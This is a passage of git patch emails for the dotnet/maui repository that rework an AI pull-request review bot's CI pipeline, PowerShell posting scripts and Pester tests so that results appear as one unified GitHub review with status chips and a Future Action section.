`APPROVE` or `REQUEST_CHANGES` from the final recommendation; the agent itself must not run review commands directly. 
--- diff --git a/.github/skills/find-regression-risk/SKILL.md b/.github/skills/find-regression-risk/SKILL.md index 506e1ff74634..d458232359e8 100644 --- a/.github/skills/find-regression-risk/SKILL.md +++ b/.github/skills/find-regression-risk/SKILL.md @@ -49,7 +49,7 @@ When `-OutputDir` is specified: ## Integration -The script runs as **STEP 4** in `Review-PR.ps1` (Regression Cross-Reference, after UI test detection and before the Gate step). Its `content.md` is assembled into the AI summary comment by `post-ai-summary-comment.ps1`. +The script runs as **STEP 4** in `Review-PR.ps1` (Regression Cross-Reference, after UI test detection and before the Gate step). Its `content.md` is assembled into the AI summary review by `post-ai-summary-comment.ps1`. When REVERT risks are detected, the regression tests from the reverted fix PRs are executed: - **UI tests** → `BuildAndRunHostApp.ps1 -Platform -TestFilter ` diff --git a/eng/pipelines/ci-copilot.yml b/eng/pipelines/ci-copilot.yml index ebce013b91ea..996e5e3f4e97 100644 --- a/eng/pipelines/ci-copilot.yml +++ b/eng/pipelines/ci-copilot.yml @@ -731,7 +731,7 @@ stages: fi echo "Review output saved to $(Build.ArtifactStagingDirectory)/copilot-logs/" - name: RunPost # Stage 3 (UpdateAISummaryComment) reads aiSummaryCommentId via $(stageDependencies.ReviewPR.CopilotReview.outputs['RunPost.aiSummaryCommentId']). Note: detectedCategories comes from RunGate, not RunPost. + name: RunPost # Stage 3 (UpdateAISummaryComment) reads aiSummaryReviewId via $(stageDependencies.ReviewPR.CopilotReview.outputs['RunPost.aiSummaryReviewId']). Note: detectedCategories comes from RunGate, not RunPost. 
displayName: 'Task 4: Post (comments + labels)' env: GH_TOKEN: $(GH_COMMENT_TOKEN) @@ -806,7 +806,7 @@ stages: # STAGE: RunDeepUITests # ───────────────────────────────────────────────────────────────────────────── # After the Copilot review agent has detected UI test categories and posted - # an initial AI summary comment with in-process per-category results, this + # an initial AI summary review with in-process per-category results, this # stage re-runs those same categories on a real platform-appropriate pool # (Tahoe iOS sim / Ubuntu Android emu / Windows-2022 / macOS-14) instead of # whatever VM the Copilot agent happened to land on. Each category becomes @@ -1272,7 +1272,7 @@ stages: } if ($hadFailure) { - # Don't fail the stage — the AI summary comment is the + # Don't fail the stage — the AI summary review is the # deliverable; failed tests get reported there. Stage-level # failure would prevent the UpdateAISummaryComment stage # from running. @@ -1304,26 +1304,26 @@ stages: # STAGE: PostAISummaryComment # ───────────────────────────────────────────────────────────────────────────── # Final stage. Depends on both ReviewPR (which posted the initial AI - # summary comment and emitted aiSummaryCommentId) and RunDeepUITests + # summary review and emitted aiSummaryReviewId) and RunDeepUITests # (which produced the TRX artifacts on the right pool). Downloads the # artifacts, parses them via Aggregate-UITestArtifacts.ps1, and edits - # the existing PR comment to replace the in-process STEP 3 section + # the existing PR review to replace the in-process STEP 3 section # with the deep-test results. 
- stage: UpdateAISummaryComment - displayName: 'Post AI Summary Comment' + displayName: 'Post AI Summary Review' dependsOn: - ReviewPR - RunDeepUITests - condition: and(in(dependencies.RunDeepUITests.result, 'Succeeded', 'SucceededWithIssues', 'Failed', 'Skipped'), or(ne(dependencies.ReviewPR.outputs['CopilotReview.RunPost.aiSummaryCommentId'], ''), in(dependencies.RunDeepUITests.result, 'Succeeded', 'SucceededWithIssues', 'Failed'))) + condition: and(in(dependencies.RunDeepUITests.result, 'Succeeded', 'SucceededWithIssues', 'Failed', 'Skipped'), or(ne(dependencies.ReviewPR.outputs['CopilotReview.RunPost.aiSummaryReviewId'], ''), in(dependencies.RunDeepUITests.result, 'Succeeded', 'SucceededWithIssues', 'Failed'))) jobs: - job: UpdateComment - displayName: 'Post AI summary with review + deep test results' + displayName: 'Post AI summary review with deep test results' # Job-level variables can use $[ stageDependencies... ] (cross-stage, # job context). The stage condition above already gated emptiness; - # this just makes the value available as $(aiSummaryCommentId) + # this just makes the value available as $(aiSummaryReviewId) # inside the steps. 
variables: - aiSummaryCommentId: $[ stageDependencies.ReviewPR.CopilotReview.outputs['RunPost.aiSummaryCommentId'] ] + aiSummaryReviewId: $[ stageDependencies.ReviewPR.CopilotReview.outputs['RunPost.aiSummaryReviewId'] ] pool: name: Azure Pipelines vmImage: ubuntu-22.04 @@ -1360,12 +1360,12 @@ stages: $artDir = "$(Pipeline.Workspace)/drop-deep-uitests" $copilotLogsDir = "$(Pipeline.Workspace)/CopilotLogs" $prNumber = "${{ parameters.PRNumber }}" - $commentId = "$(aiSummaryCommentId)" - $isDeferred = ($commentId -eq 'DEFERRED') + $reviewId = "$(aiSummaryReviewId)" + $isDeferred = ([string]::IsNullOrWhiteSpace($reviewId) -or $reviewId -eq 'DEFERRED') # Diagnostic logging for Stage 3 debugging Write-Host "=== Stage 3 Diagnostics ===" -ForegroundColor Cyan - Write-Host " commentId: '$commentId'" + Write-Host " reviewId: '$reviewId'" Write-Host " isDeferred: $isDeferred" Write-Host " artDir exists: $(Test-Path $artDir)" Write-Host " copilotLogsDir exists: $(Test-Path $copilotLogsDir)" @@ -1377,16 +1377,16 @@ stages: } } - if ([string]::IsNullOrWhiteSpace($commentId)) { - # Reviewer crashed before posting the initial comment. If deep + if ([string]::IsNullOrWhiteSpace($reviewId)) { + # Reviewer crashed before posting the initial review. If deep # tests produced results, fall back to DEFERRED mode to post - # a degraded comment with test results only. + # a degraded review with test results only. 
if (Test-Path $artDir) { - Write-Host "No AI summary comment ID but deep test artifacts exist — falling back to DEFERRED mode" - $commentId = 'DEFERRED' + Write-Host "No AI summary review ID but deep test artifacts exist — falling back to DEFERRED mode" + $reviewId = 'DEFERRED' $isDeferred = $true } else { - Write-Host "No AI summary comment ID and no deep test artifacts — nothing to do" + Write-Host "No AI summary review ID and no deep test artifacts — nothing to do" exit 0 } } @@ -1584,13 +1584,13 @@ stages: if ($isDeferred) { # Keep deferred mode even if a prior AI Summary exists. The - # posting script preserves existing sessions, deletes stale - # generated comments, then posts a fresh unified comment. - Write-Host "Deferred AI Summary posting will clean up any stale generated comments before posting" + # posting script preserves current-run artifacts, hides stale + # generated comments/reviews, then posts a fresh summary review. + Write-Host "Deferred AI Summary posting will hide stale generated artifacts before posting" } if ($isDeferred) { - # ── DEFERRED MODE (first run): Post full comment ── + # ── DEFERRED MODE (first run): Post full review ── # Find the PRAgent content dir from CopilotLogs artifact $prAgentDir = Get-ChildItem -Path $copilotLogsDir -Recurse -Directory -Filter "PRAgent" | Select-Object -First 1 if (-not $prAgentDir) { @@ -1623,7 +1623,7 @@ stages: Write-Host "Replaced in-process results with deep results" } } else { - Write-Host "No deep results — posting review-only comment" + Write-Host "No deep results — posting review-only summary" } # Copy PRAgent dir to expected location for post-ai-summary-comment.ps1 @@ -1631,13 +1631,13 @@ stages: New-Item -ItemType Directory -Force -Path (Split-Path -Parent $targetDir) | Out-Null Copy-Item -Path $prAgentDir.FullName -Destination $targetDir -Recurse -Force - # Post the full comment + # Post the full review $postScript = ".github/scripts/post-ai-summary-comment.ps1" if (Test-Path $postScript) { - 
Write-Host "Posting full AI summary comment with deep results..." + Write-Host "Posting full AI summary review with deep results..." $output = & $postScript -PRNumber $prNumber $output | ForEach-Object { Write-Host $_ } - Write-Host "✅ Full AI summary comment posted with deep results" + Write-Host "✅ Full AI summary review posted with deep results" } # Apply labels @@ -1653,14 +1653,14 @@ stages: } } } else { - # ── PATCH MODE: Update existing comment with deep results ── + # ── PATCH MODE: Update existing review with deep results ── if (-not $deepBlock) { - Write-Host "No deep results and comment already exists — nothing to patch" + Write-Host "No deep results and review already exists — nothing to patch" exit 0 } - $existing = (gh api "repos/dotnet/maui/issues/comments/$commentId" --jq '.body') -join [Environment]::NewLine + $existing = (gh api "repos/dotnet/maui/pulls/$prNumber/reviews/$reviewId" --jq '.body') -join [Environment]::NewLine if ([string]::IsNullOrWhiteSpace($existing)) { - Write-Host "Could not fetch comment body — aborting" + Write-Host "Could not fetch review body — aborting" exit 0 } @@ -1686,9 +1686,9 @@ stages: $tmp = New-TemporaryFile @{ body = $newBody } | ConvertTo-Json -Depth 4 -Compress | Set-Content $tmp -Encoding UTF8 - gh api -X PATCH "repos/dotnet/maui/issues/comments/$commentId" --input $tmp.FullName | Out-Null - Write-Host "✅ Patched comment $commentId with deep UI test results ($totalPassed/$($totalPassed + $totalFailed))" + gh api -X PUT "repos/dotnet/maui/pulls/$prNumber/reviews/$reviewId" --input $tmp.FullName | Out-Null + Write-Host "✅ Patched review $reviewId with deep UI test results ($totalPassed/$($totalPassed + $totalFailed))" } - displayName: 'Post AI summary comment' + displayName: 'Post AI summary review' env: GH_TOKEN: $(GH_COMMENT_TOKEN) From d461a5b1f23f89533a7c35346d2704ca8f05d6fa Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Sun, 31 May 2026 14:48:22 +0200 Subject: 
[PATCH 19/34] Update MauiBot AI summary layout Use the unified AI Review Summary layout with segmented status chips, collapsed review sessions, and a Future Action section for alternative fix guidance. Avoid posting a separate try-fix review so the AI summary is the single source of truth. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Review-PR.ps1 | 86 +---- .github/scripts/post-ai-summary-comment.ps1 | 329 ++++++++++++++++++-- 2 files changed, 309 insertions(+), 106 deletions(-) diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index f1da6706ae02..575dff836e2b 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -1774,88 +1774,10 @@ if ($isPRWinner) { } } } else { - # Non-PR candidate won — submit a REQUEST_CHANGES review with the candidate diff in the body - Write-Host " 📝 Non-PR candidate won — submitting REQUEST_CHANGES review with candidate diff..." -ForegroundColor Cyan - - $maxDiffBytes = 55KB - $diff = [string]$winner.candidateDiff - $truncated = $false - # Truncate by binary-searching the largest character count whose UTF-8 - # encoding fits within the byte budget (reserving room for the marker line). - # O(log n) and much cheaper than the previous O(n²) trim-512-and-recount loop. - $marker = "`n... 
[truncated]" - $markerBytes = [System.Text.Encoding]::UTF8.GetByteCount($marker) - $budget = $maxDiffBytes - $markerBytes - if ([System.Text.Encoding]::UTF8.GetByteCount($diff) -gt $maxDiffBytes) { - $lo = 0 - $hi = $diff.Length - while ($lo -lt $hi) { - $mid = [int](($lo + $hi + 1) / 2) - $bytes = [System.Text.Encoding]::UTF8.GetByteCount($diff.Substring(0, $mid)) - if ($bytes -le $budget) { $lo = $mid } else { $hi = $mid - 1 } - } - $diff = $diff.Substring(0, $lo) + $marker - $truncated = $true - } - - # Compute an outer code fence longer than any backtick run inside the diff - # (minimum 4) so the diff content cannot accidentally close the fence and - # leak into the surrounding markdown. Preserves the diff text exactly. - $maxBacktickRun = 0 - foreach ($m in [regex]::Matches($diff, '`+')) { - if ($m.Length -gt $maxBacktickRun) { $maxBacktickRun = $m.Length } - } - $fenceLen = [Math]::Max(4, $maxBacktickRun + 1) - $fence = '`' * $fenceLen - - $rationale = if ($winner.summary) { [string]$winner.summary } else { "Automated review identified a stronger candidate fix." } - $reviewBody = @" - -🤖 **Automated review — alternative fix proposed** - -The expert-reviewer evaluation compared the PR fix against $($winner.winner -replace 'try-fix-','#') automatically generated candidates and selected ``$($winner.winner)`` as the strongest fix. - -**Why:** $rationale - -Please consider applying the candidate diff below (or use it as guidance). Once you push an update, this workflow will re-trigger and re-evaluate. - -
Candidate diff (``$($winner.winner)``) - -${fence}diff -$diff -$fence - -
-$( if ($truncated) { "`n_The diff was truncated to fit GitHub's review body limit._" } ) -"@ - - if ($DryRun) { - Write-Host " [DryRun] Would POST review state=REQUEST_CHANGES with body length $($reviewBody.Length)" -ForegroundColor Yellow - } else { - try { - $bodyJson = @{ body = $reviewBody; event = 'REQUEST_CHANGES' } | ConvertTo-Json -Compress -Depth 5 - $tmp = New-TemporaryFile - Set-Content -LiteralPath $tmp -Value $bodyJson -Encoding utf8 -NoNewline - $resp = & gh api -X POST "repos/dotnet/maui/pulls/$PRNumber/reviews" --input $tmp 2>&1 - Remove-Item -LiteralPath $tmp -Force -ErrorAction SilentlyContinue - if ($LASTEXITCODE -eq 0) { - $tryFixReview = (($resp -join [Environment]::NewLine) | ConvertFrom-Json) - $tryFixDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent" - New-Item -ItemType Directory -Force -Path $tryFixDir | Out-Null - if ($tryFixReview.id) { - [string]$tryFixReview.id | Set-Content (Join-Path $tryFixDir "try-fix-review-id.txt") -Encoding UTF8 - } - if ($tryFixReview.node_id) { - [string]$tryFixReview.node_id | Set-Content (Join-Path $tryFixDir "try-fix-review-node-id.txt") -Encoding UTF8 - } - Write-Host " ✅ REQUEST_CHANGES review submitted" -ForegroundColor Green - } else { - Write-Host " ⚠️ Failed to submit REQUEST_CHANGES review (non-fatal): $resp" -ForegroundColor Yellow - } - } catch { - Write-Host " ⚠️ REQUEST_CHANGES submission threw (non-fatal): $_" -ForegroundColor Yellow - } - } + # Non-PR candidate details are now merged into the unified AI Summary + # Future Action section. Avoid a second MauiBot review so the PR has one + # source of truth for automated review guidance. 
+ Write-Host " ⏭️ Non-PR candidate selected; Future Action is included in AI Summary" -ForegroundColor Cyan Write-Host " ⏭️ Skipping inline findings (winner is not the PR fix)" -ForegroundColor Gray } diff --git a/.github/scripts/post-ai-summary-comment.ps1 b/.github/scripts/post-ai-summary-comment.ps1 index 2add8afa6c8e..444288e49895 100644 --- a/.github/scripts/post-ai-summary-comment.ps1 +++ b/.github/scripts/post-ai-summary-comment.ps1 @@ -58,11 +58,11 @@ if (Test-Path $commentCleanupScript) { Write-Host "ℹ️ Loading phase content for PR #$PRNumber..." -ForegroundColor Cyan +$RepoRoot = git rev-parse --show-toplevel 2>$null $PRAgentDir = "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent" if (-not (Test-Path $PRAgentDir)) { - $repoRoot = git rev-parse --show-toplevel 2>$null - if ($repoRoot) { - $PRAgentDir = Join-Path $repoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent" + if ($RepoRoot) { + $PRAgentDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent" } } @@ -71,12 +71,12 @@ if (-not (Test-Path $PRAgentDir)) { } $phases = [ordered]@{ - "uitests" = @{ File = "uitests/content.md"; Icon = "🧪"; Title = "UI Tests" } - "regression-check" = @{ File = "regression-check/content.md"; Icon = "🔍"; Title = "Regression Cross-Reference" } - "pre-flight" = @{ File = "pre-flight/content.md"; Icon = "🔍"; Title = "Pre-Flight — Context & Validation" } - "code-review" = @{ File = "pre-flight/code-review.md"; Icon = "🔬"; Title = "Code Review — Deep Analysis" } - "try-fix" = @{ File = "try-fix/content.md"; Icon = "🔧"; Title = "Fix — Analysis & Comparison" } - "report" = @{ File = "report/content.md"; Icon = "📋"; Title = "Report — Final Recommendation" } + "uitests" = @{ File = "uitests/content.md"; Title = "UI Tests" } + "regression-check" = @{ File = "regression-check/content.md"; Title = "Regression Cross-Reference" } + "pre-flight" = @{ File = "pre-flight/content.md"; Title = "Pre-Flight — Context & Validation" } + "code-review" = @{ File = 
"pre-flight/code-review.md"; Title = "Code Review — Deep Analysis" } + "try-fix" = @{ File = "try-fix/content.md"; Title = "Fix — Analysis & Comparison" } + "report" = @{ File = "report/content.md"; Title = "Report — Final Recommendation" } } function Test-PhaseContentIsNoOp { @@ -126,6 +126,270 @@ function Get-AIReviewEvent { return 'COMMENT' } +function ConvertTo-TitleCase { + param([string]$Value) + + if ([string]::IsNullOrWhiteSpace($Value)) { + return $Value + } + + $trimmed = $Value.Trim() + switch -Regex ($trimmed) { + '(?i)^android$' { return 'Android' } + '(?i)^ios$' { return 'iOS' } + '(?i)^maccatalyst$' { return 'MacCatalyst' } + '(?i)^windows$' { return 'Windows' } + '(?i)^all$' { return 'All' } + } + + return (Get-Culture).TextInfo.ToTitleCase($trimmed.ToLowerInvariant()) +} + +function ConvertTo-ShieldsSegment { + param([string]$Value) + + $encoded = [uri]::EscapeDataString($Value) + return ($encoded -replace '-', '--' -replace '_', '__') +} + +function New-StatusChip { + param( + [Parameter(Mandatory = $true)][string]$Label, + [Parameter(Mandatory = $true)][string]$Value, + [Parameter(Mandatory = $true)][string]$Color + ) + + $labelSegment = ConvertTo-ShieldsSegment $Label + $valueSegment = ConvertTo-ShieldsSegment $Value + $alt = "$Label $Value" -replace '"', '"' + return " `"$alt`"" +} + +function Get-GateStatus { + param([string]$GateContent) + + if ([string]::IsNullOrWhiteSpace($GateContent)) { + return 'Unknown' + } + + if ($GateContent -match '(?im)Gate Result:\s*(?:\S+\s*)?(FAILED|PASSED|SKIPPED)') { + return ConvertTo-TitleCase $Matches[1] + } + + if ($GateContent -match '(?i)\bfailed\b') { return 'Failed' } + if ($GateContent -match '(?i)\bpassed\b') { return 'Passed' } + if ($GateContent -match '(?i)\bskipped\b') { return 'Skipped' } + return 'Unknown' +} + +function Get-ConfidenceStatus { + param([string[]]$Contents) + + foreach ($content in $Contents) { + if ([string]::IsNullOrWhiteSpace($content)) { + continue + } + + if ($content -match 
'(?im)\*\*Confidence:\*\*\s*(high|medium|low|unknown)') { + return ConvertTo-TitleCase $Matches[1] + } + if ($content -match '(?im)^Confidence:\s*(high|medium|low|unknown)') { + return ConvertTo-TitleCase $Matches[1] + } + } + + return 'Unknown' +} + +function Get-PlatformStatus { + param([string[]]$Contents) + + foreach ($content in $Contents) { + if ([string]::IsNullOrWhiteSpace($content)) { + continue + } + + if ($content -match '(?im)\*\*Platform:\*\*\s*([A-Za-z, /]+)') { + return ConvertTo-TitleCase (($Matches[1] -split '[,/]')[0]) + } + if ($content -match '(?im)\*\*Platforms Affected:\*\*\s*([A-Za-z, /]+)') { + return ConvertTo-TitleCase (($Matches[1] -split '[,/]')[0]) + } + } + + return 'Unknown' +} + +function New-StatusChipRow { + param( + [string]$GateStatus, + [string]$ReviewStatus, + [string]$Confidence, + [string]$Platform + ) + + $gateColor = switch ($GateStatus) { + 'Passed' { '1a7f37' } + 'Skipped' { 'bf8700' } + default { 'd1242f' } + } + $reviewColor = switch ($ReviewStatus) { + 'LGTM' { '1a7f37' } + 'Approved' { '1a7f37' } + 'Needs Changes' { 'd1242f' } + default { '0969da' } + } + $confidenceColor = switch ($Confidence) { + 'High' { '0969da' } + 'Medium' { 'bf8700' } + 'Low' { 'd1242f' } + default { '57606a' } + } + $platformColor = if ($Platform -eq 'Unknown') { '57606a' } else { '8250df' } + + $chips = @( + (New-StatusChip -Label 'Gate' -Value $GateStatus -Color $gateColor), + (New-StatusChip -Label 'Code Review' -Value $ReviewStatus -Color $reviewColor), + (New-StatusChip -Label 'Confidence' -Value $Confidence -Color $confidenceColor), + (New-StatusChip -Label 'Platform' -Value $Platform -Color $platformColor) + ) + + return @" +

+$($chips -join "`n") +

+"@ +} + +function New-FutureActionSection { + param( + [Parameter(Mandatory = $true)][string]$PRAgentDir + ) + + $winnerFile = Join-Path $PRAgentDir "winner.json" + if (-not (Test-Path $winnerFile)) { + return @" +--- + +
+Future Action — review latest findings +
+ +No alternative fix was selected for this run. Review the session findings and CI results before merging. + +
+"@ + } + + try { + $winner = Get-Content -Raw -LiteralPath $winnerFile -Encoding UTF8 | ConvertFrom-Json + } catch { + return @" +--- + +
+Future Action — review latest findings +
+ +The workflow could not parse the fix-selection result. Review the session findings and CI results before merging. + +
+"@ + } + + if ($winner.isPRFix -eq $true -or [string]::IsNullOrWhiteSpace([string]$winner.winner)) { + return @" +--- + +
+Future Action — review latest findings +
+ +No alternative fix was selected for this run. Review the session findings and CI results before merging. + +
+"@ + } + + $selected = [string]$winner.winner + $rationale = if ($winner.summary) { [string]$winner.summary } else { "Automated review identified a stronger candidate fix." } + $diff = [string]$winner.candidateDiff + $truncated = $false + + if ([string]::IsNullOrWhiteSpace($diff)) { + $diff = "Candidate diff was not available in winner.json." + } else { + $maxDiffBytes = 55KB + $marker = "`n... [truncated]" + $markerBytes = [System.Text.Encoding]::UTF8.GetByteCount($marker) + $budget = $maxDiffBytes - $markerBytes + if ([System.Text.Encoding]::UTF8.GetByteCount($diff) -gt $maxDiffBytes) { + $lo = 0 + $hi = $diff.Length + while ($lo -lt $hi) { + $mid = [int](($lo + $hi + 1) / 2) + $bytes = [System.Text.Encoding]::UTF8.GetByteCount($diff.Substring(0, $mid)) + if ($bytes -le $budget) { $lo = $mid } else { $hi = $mid - 1 } + } + $diff = $diff.Substring(0, $lo) + $marker + $truncated = $true + } + } + + $maxBacktickRun = 0 + foreach ($m in [regex]::Matches($diff, '`+')) { + if ($m.Length -gt $maxBacktickRun) { $maxBacktickRun = $m.Length } + } + $fenceLen = [Math]::Max(4, $maxBacktickRun + 1) + $fence = '`' * $fenceLen + $truncatedNote = if ($truncated) { "`n_The diff was truncated to fit GitHub's review body limit._" } else { "" } + + return @" +--- + +
+Future Action — alternative fix proposed ($selected) +
+ +**Automated review — alternative fix proposed** + +The expert-reviewer evaluation compared the PR fix against automatically generated candidates and selected $selected as the strongest fix. + +**Why:** $rationale + +Please consider applying the candidate diff below (or use it as guidance). Once you push an update, this workflow will re-trigger and re-evaluate. + +
Candidate diff ($selected) + +${fence}diff +$diff +$fence + +
+$truncatedNote + +
+"@ +} + +function Test-HasNonPRWinner { + param( + [Parameter(Mandatory = $true)][string]$PRAgentDir + ) + + $winnerFile = Join-Path $PRAgentDir "winner.json" + if (-not (Test-Path $winnerFile)) { + return $false + } + + try { + $winner = Get-Content -Raw -LiteralPath $winnerFile -Encoding UTF8 | ConvertFrom-Json + return ($winner.isPRFix -eq $false -and -not [string]::IsNullOrWhiteSpace([string]$winner.winner)) + } catch { + return $false + } +} + function Get-PreservedMauiBotNodeIds { param([Parameter(Mandatory = $true)][string]$PRAgentDir) @@ -183,16 +447,17 @@ function Invoke-PostPullRequestReview { } } -# ─── Gate content (rendered first, always open) ─── +# ─── Gate content (rendered first, collapsed) ─── $gateSection = $null +$gateContent = $null $gateFilePath = Join-Path $PRAgentDir "gate/content.md" if (Test-Path $gateFilePath) { $gateContent = Get-Content $gateFilePath -Raw -Encoding UTF8 if (-not [string]::IsNullOrWhiteSpace($gateContent)) { Write-Host " ✅ gate ($((Get-Item $gateFilePath).Length) bytes)" -ForegroundColor Green $gateSection = @" -
-🚦 Gate — Test Before & After Fix +
+Gate — Test Before & After Fix
$gateContent @@ -224,11 +489,11 @@ foreach ($key in $phases.Keys) { $phaseContentByKey[$key] = $content Write-Host " ✅ $key ($((Get-Item $filePath).Length) bytes)" -ForegroundColor Green # For uitests, make title dynamic: "UI Tests — Cat1, Cat2" - $phaseTitle = "$($phase.Icon) $($phase.Title)" + $phaseTitle = $phase.Title if ($key -eq "uitests") { $catMatch = [regex]::Match($content, 'Detected UI test categories:\*\*\s*`{1,2}([^`]+)`{1,2}') if ($catMatch.Success) { - $phaseTitle = "$($phase.Icon) $($phase.Title) — $($catMatch.Groups[1].Value)" + $phaseTitle = "$($phase.Title) — $($catMatch.Groups[1].Value)" } } $phaseSections += @" @@ -253,6 +518,9 @@ if (-not $gateSection -and $phaseSections.Count -eq 0) { } $reviewEvent = Get-AIReviewEvent -ReportContent $phaseContentByKey['report'] +if ((Test-HasNonPRWinner -PRAgentDir $PRAgentDir) -and $reviewEvent -eq 'COMMENT') { + $reviewEvent = 'REQUEST_CHANGES' +} Write-Host " 🧾 PR review event: $reviewEvent" -ForegroundColor Cyan # ============================================================================ @@ -281,7 +549,7 @@ $timestamp = (Get-Date).ToUniversalTime().ToString("yyyy-MM-dd HH:mm UTC") # BUILD NEW SESSION BLOCK # ============================================================================ -# Combine gate (always first, open) with phases (collapsed). When only one +# Combine gate (always first) with phases (collapsed). When only one # kind of content is available, the session still renders cleanly. $sessionParts = @() if ($gateSection) { $sessionParts += $gateSection } @@ -291,18 +559,14 @@ $phaseContent = $sessionParts -join "`n`n---`n`n" $sessionMarkerStart = "" $sessionMarkerEnd = "" -# The latest session is built with
; when merged into existing -# sessions the script re-tags only the newest as "open". $newSessionBlock = @" $sessionMarkerStart -
-📊 Review Session$commitSha7 · $commitTitle · $timestamp +
+Review Sessions — click to expand
$phaseContent ---- -
$sessionMarkerEnd "@ @@ -342,9 +606,22 @@ if ($existingRaw) { $authorPing = "" if ($prAuthor) { - $authorPing = "> 👋 @$prAuthor — new AI review results are available. Please review the latest session below." + $authorPing = "> @$prAuthor — new AI review results are available based on this last commit: $commitSha7.`n> **$commitTitle**" } +$reviewStatus = switch ($reviewEvent) { + 'APPROVE' { 'LGTM' } + 'REQUEST_CHANGES' { 'Needs Changes' } + default { 'In Review' } +} +$summaryContent = @($gateContent) + @($phaseContentByKey.Values) +$statusChipRow = New-StatusChipRow ` + -GateStatus (Get-GateStatus -GateContent $gateContent) ` + -ReviewStatus $reviewStatus ` + -Confidence (Get-ConfidenceStatus -Contents $summaryContent) ` + -Platform (Get-PlatformStatus -Contents $summaryContent) +$futureActionSection = New-FutureActionSection -PRAgentDir $PRAgentDir + $finalizeSection = "" $finalizePattern = '(?s)(.*?)' if ($existingBodies -and $existingBodies.Count -gt 0) { @@ -359,11 +636,15 @@ if ($existingBodies -and $existingBodies.Count -gt 0) { $commentBody = @" $MARKER -## 🤖 AI Summary +## AI Review Summary $authorPing -$newSessionBlock$finalizeSection +$statusChipRow + +$newSessionBlock + +$futureActionSection$finalizeSection "@ # Clean up excessive blank lines From 8fcd355bb854cfed34357ba09d563baa79d3cb0d Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Sun, 31 May 2026 14:56:09 +0200 Subject: [PATCH 20/34] Merge try-fix guidance into AI summary review Keep AI Summary as the single current MauiBot review artifact, ensure non-PR try-fix winners request changes through that review, and prevent stale try-fix cleanup from hiding the merged summary. 
Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .../scripts/Post-AISummaryComment.Tests.ps1 | 86 ++++++++++++++++++- .../Remove-StaleMauiBotComments.Tests.ps1 | 18 ++++ .github/scripts/post-ai-summary-comment.ps1 | 38 +++----- .../shared/Remove-StaleMauiBotComments.ps1 | 4 + 4 files changed, 117 insertions(+), 29 deletions(-) diff --git a/.github/scripts/Post-AISummaryComment.Tests.ps1 b/.github/scripts/Post-AISummaryComment.Tests.ps1 index b02a84fda302..ee0d3767ba62 100644 --- a/.github/scripts/Post-AISummaryComment.Tests.ps1 +++ b/.github/scripts/Post-AISummaryComment.Tests.ps1 @@ -17,7 +17,13 @@ BeforeAll { throw ($parseErrors | ForEach-Object { $_.Message }) -join [Environment]::NewLine } - foreach ($functionName in @('Test-PhaseContentIsNoOp', 'Get-AIReviewEvent')) { + foreach ($functionName in @( + 'Test-PhaseContentIsNoOp', + 'Get-AIReviewEvent', + 'Test-HasNonPRWinner', + 'Get-AIReviewEventForRun', + 'New-FutureActionSection' + )) { $function = $ast.Find({ $args[0] -is [System.Management.Automation.Language.FunctionDefinitionAst] -and $args[0].Name -eq $functionName @@ -92,3 +98,81 @@ Describe 'Get-AIReviewEvent' { Get-AIReviewEvent -ReportContent 'Recommendation: APPROVE after manual review' | Should -Be 'COMMENT' } } + +Describe 'Get-AIReviewEventForRun' { + BeforeEach { + $script:testDir = Join-Path ([System.IO.Path]::GetTempPath()) "ai-summary-tests-$([guid]::NewGuid())" + New-Item -ItemType Directory -Path $script:testDir -Force | Out-Null + } + + AfterEach { + Remove-Item -LiteralPath $script:testDir -Recurse -Force -ErrorAction SilentlyContinue + } + + It 'requests changes when a non-PR try-fix candidate wins and the report is otherwise comment-only' { + @{ + winner = 'try-fix-1' + isPRFix = $false + candidateDiff = 'diff --git a/file.cs b/file.cs' + summary = 'Candidate fixes the issue more directly.' 
+ } | ConvertTo-Json -Depth 5 | Set-Content (Join-Path $script:testDir 'winner.json') -Encoding UTF8 + + Get-AIReviewEventForRun -ReportContent 'Report still in progress.' -PRAgentDir $script:testDir | + Should -Be 'REQUEST_CHANGES' + } + + It 'does not override an exact approve recommendation' { + @{ + winner = 'try-fix-1' + isPRFix = $false + candidateDiff = 'diff --git a/file.cs b/file.cs' + } | ConvertTo-Json -Depth 5 | Set-Content (Join-Path $script:testDir 'winner.json') -Encoding UTF8 + + Get-AIReviewEventForRun -ReportContent 'Final Recommendation: APPROVE' -PRAgentDir $script:testDir | + Should -Be 'APPROVE' + } + + It 'does not force changes for missing, malformed, or PR-fix winner files' { + Get-AIReviewEventForRun -ReportContent '' -PRAgentDir $script:testDir | + Should -Be 'COMMENT' + + 'not json' | Set-Content (Join-Path $script:testDir 'winner.json') -Encoding UTF8 + Get-AIReviewEventForRun -ReportContent '' -PRAgentDir $script:testDir | + Should -Be 'COMMENT' + + @{ + winner = 'pr' + isPRFix = $true + } | ConvertTo-Json -Depth 5 | Set-Content (Join-Path $script:testDir 'winner.json') -Encoding UTF8 + Get-AIReviewEventForRun -ReportContent '' -PRAgentDir $script:testDir | + Should -Be 'COMMENT' + } +} + +Describe 'New-FutureActionSection' { + BeforeEach { + $script:testDir = Join-Path ([System.IO.Path]::GetTempPath()) "future-action-tests-$([guid]::NewGuid())" + New-Item -ItemType Directory -Path $script:testDir -Force | Out-Null + } + + AfterEach { + Remove-Item -LiteralPath $script:testDir -Recurse -Force -ErrorAction SilentlyContinue + } + + It 'renders selected try-fix candidate guidance in the AI Summary Future Action section' { + @{ + winner = 'try-fix-2' + isPRFix = $false + summary = 'Candidate avoids the regression.' 
